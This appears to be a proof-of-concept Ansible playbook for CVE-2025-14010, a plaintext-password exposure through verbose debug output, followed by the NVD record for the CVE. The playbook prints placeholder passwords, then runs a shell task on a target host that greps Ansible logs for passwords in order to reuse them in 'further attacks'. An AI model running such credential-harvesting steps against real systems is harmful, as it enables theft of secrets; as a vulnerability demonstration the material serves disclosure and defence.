CVE-2025-14010

# PoC for CVE-2025-14010 # Information Exposure in ansible-collection-community-general # Run with: ansible-playbook -vvv poc.yml - name: CVE-2025-14010 PoC - Information Exposure hosts: localhost gather_facts: no vars: sensitive_password: "Admin@123!SecretPassword" db_password: "P@ssw0rd!2024" tasks: - name: Simulate vulnerable debug output ansible.builtin.debug: msg: "Password being used: {{ sensitive_password }}" - name: Vulnerable set_stats usage ansible.builtin.set_stats: data: debug_info: "Using credentials: {{ sensitive_password }}" # With -vvv flag, these outputs will expose plaintext passwords # Attackers can extract passwords from logs: # grep -r "Password" ansible.log | grep -v "$ANSIBLE_" - name: Exploitation via log analysis hosts: target gather_facts: no vars: admin_password: "{{ hostvars['localhost'].sensitive_password }}" tasks: - name: Extract exposed credentials ansible.builtin.shell: cmd: "grep -i 'password' /var/log/ansible/*.log | tail -20" register: exposed_creds - name: Use exposed credentials for further attacks ansible.builtin.debug: msg: "Exposed credentials: {{ exposed_creds.stdout }}"

{"cve": {"id": "CVE-2025-14010", "sourceIdentifier": "[email protected]", "published": "2025-12-04T10:16:00.810", "lastModified": "2026-05-20T13:16:15.250", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in ansible-collection-community-general. This vulnerability allows for information exposure (IE) of sensitive credentials, specifically plaintext passwords, via verbose output when running Ansible with debug modes. Attackers with access to logs could retrieve these secrets and potentially compromise Keycloak accounts or administrative access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redhat:community.general:-:*:*:*:*:*:*:*", "matchCriteriaId": "FFB54908-462D-4CE6-9AB2-56997B0EFB79"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2025-14010", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418774", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/ansible-collections/community.general/issues/11000", "source": "[email protected]"}, {"url": "https://github.com/ansible-collections/community.general/pull/11005", "source": "[email protected]"}, {"url": "https://github.com/ansible-community/ansible-build-data/blob/main/12/CHANGELOG-v12.md#security-fixes", "source": "[email protected]"}, {"url": "https://github.com/ansible-collections/community.general/issues/11000", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}